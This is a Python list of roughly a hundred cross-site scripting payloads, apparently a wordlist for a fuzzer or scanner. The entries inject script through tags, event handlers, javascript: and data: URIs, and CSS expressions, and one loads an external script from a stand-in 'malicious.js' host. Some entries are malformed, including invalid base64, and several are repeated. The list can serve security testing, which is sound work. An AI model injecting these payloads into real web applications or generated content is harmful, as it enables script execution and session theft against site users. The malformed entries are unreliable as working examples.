payloads = [
' <script>alert(1)</script>', 
' <img src="x" onerror="alert(1)">', 
' <svg/onload=alert(1)>', 
' <iframe src="javascript:alert(1)"></iframe>', 
' <input autofocus onfocus="alert(1)">', 
' <script src="javascript:alert(1)"></script>', 
' <script>alert(\'XSS\')</script>', 
' <div onmouseover="alert(1)">hover me</div>', 
' <a href="javascript:alert(1)">click me</a>', 
' <body onload="alert(1)">', 
' <form action="javascript:alert(1)"></form>', 
' <script>confirm(\'XSS\')</script>', 
' <button onclick="alert(1)">click me</button>', 
' <meta http-equiv="refresh" content="0;url=javascript:alert(1)">', 
' <input value="<script>alert(1)</script>" />', 
' <img src="x" onerror="alert(\'XSS\')">', 
' <svg><script>alert(1)</script></svg>', 
' <audio src="javascript:alert(1)"></audio>', 
' <video src="javascript:alert(1)"></video>', 
' <object data="javascript:alert(1)"></object>', 
' <embed src="javascript:alert(1)"></embed>', 
' <link rel="stylesheet" href="javascript:alert(1)">', 
' <style>@import \'javascript:alert(1)\';</style>', 
' <script src="data:text/javascript;base64,YWxert3nZDdiQm5nbjw!="></script>', 
' <script>alert("XSS")</script>', 
' <script>eval(\'alert(1)\')</script>', 
' <script>setTimeout("alert(1)", 1000);</script>', 
' <img src="x" onerror="eval(\'alert(1)\')">', 
' <object data="data:text/html;base64,<script>alert(1)</script>"></object>', 
' <meta http-equiv="refresh" content="0;url=javascript:alert(1)">', 
' <script>window.onload = function(){ alert(1); }</script>', 
' <iframe src="javascript:alert(1)"></iframe>', 
' <script src="https://example.com/malicious.js"></script>', 
' <input type="text" onfocus="alert(1)">', 
' <textarea onfocus="alert(1)"></textarea>', 
' <input type="image" src="x" onerror="alert(1)">', 
' <a href="javascript:alert(\'XSS\')">Click here</a>', 
' <b onmouseover="alert(1)">Hover over me</b>', 
' <h1 onmouseover="alert(1)">Header</h1>', 
' <input type="button" value="Click me" onclick="alert(1)">', 
' <div onclick="alert(1)">Click me</div>', 
' <button onclick="location.href=\'javascript:alert(1)\'">Click me</button>', 
' <div id="test" style="background-image: url(javascript:alert(1));"></div>', 
' <a href="javascript:confirm(\'XSS\')">Link</a>', 
' <form action="javascript:confirm(\'XSS\')"></form>', 
' <svg onload="alert(1)"></svg>', 
' <script>document.write(\'<script>alert(1)</script>\');</script>', 
' <style>.test { background-image: url("javascript:alert(1)"); }</style>', 
' <button onclick="javascript:alert(1)">Button</button>', 
' <h2 style="width: expression(alert(1));"></h2>', 
' <div style="width: expression(alert(1));"></div>', 
' <marquee behavior="scroll" direction="left" onstart="alert(1)">Text</marquee>', 
' <table background="javascript:alert(1)"></table>', 
' <link rel="stylesheet" href="javascript:alert(1)">', 
' <style>.test { position: absolute; left: expression(alert(1)); }</style>', 
' <div style="position: absolute; left: expression(alert(1));"></div>', 
' <input type="button" value="Click" onclick="javascript:alert(1)">', 
' <script>function xss(){ alert(1); }</script>', 
' <object type="image/svg+xml" data="x" onerror="alert(1)">', 
' <script>location=\'javascript:alert(1)\'</script>', 
' <a href="javascript:eval(\'alert(1)\')">Click me</a>', 
' <form action="javascript:eval(\'alert(1)\')"></form>', 
' <div style="background-image:url(javascript:alert(1))">Div</div>', 
' <script>document.location="javascript:alert(1)"</script>', 
' <script src="data:text/javascript,alert(1)"></script>', 
' <audio src="data:text/javascript,alert(1)"></audio>', 
' <video src="data:text/javascript,alert(1)"></video>', 
' <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>', 
' <meta http-equiv="refresh" content="0;url=javascript:alert(1)">', 
' <script>window.onerror = function(){alert(1);}</script>', 
' <input value="x" onfocus="this.value=\'\'>\x3cscript\x3ealert(1)\x3c/script\x3e" />', 
' <input type="checkbox" onclick="alert(1)">', 
' <img src="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+PC9zdmc+" />', 
' <button onmouseover="alert(1)">Mouseover Button</button>', 
' <h3 style="background:url(\'data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+PC9zdmc=\')">Header</h3>', 
' <script>function myFunction() { alert(\'XSS\'); }</script>', 
' <div><img src="x" onerror="alert(1)"><p>Text</p></div>', 
' <h3 style="background:url(\'javascript:alert(1)\')">Header</h3>', 
' <script>setInterval(function() { alert(1); }, 5000);</script>', 
' <meta http-equiv="refresh" content="0;url=javascript:alert(\'XSS\')">', 
' <button onclick="eval(\'alert(1)\')">Click me</button>', 
' <script>window.setTimeout(\'alert(1)\', 500);</script>', 
' <svg/onload="alert(1)">', 
' <object data="data:text/html,<script>alert(1)</script>"></object>', 
' <button onmouseover="alert(1)">Hover me</button>', 
' <img src="javascript:alert(1)">', 
' <a href="javascript:eval(\'alert(1)\')">Test</a>', 
' <iframe src="javascript:alert(1)"></iframe>', 
' <audio src="javascript:alert(1)"></audio>', 
' <script>document.location.href=\'javascript:alert(1)\'</script>', 
' <button onclick="window.location=\'javascript:alert(1)\'">Click me</button>', 
' <meta http-equiv="refresh" content="0;url=javascript:confirm(\'XSS\')">', 
' <input value="x" onfocus="alert(1)" />', 
' <iframe src="javascript:alert(1)"></iframe>', 
' <img src="x" onerror="alert(\'XSS\')">', 
' <a href="javascript:eval(\'alert(1)\')">Link</a>', 
' <script src="javascript:alert(1)"></script>', 
' <object data="javascript:eval(\'alert(1)\')"></object>', 
' <style>.test { width: expression(alert(1)); }</style>', 
' <div style="position:absolute; left: expression(alert(1));"></div>'
]
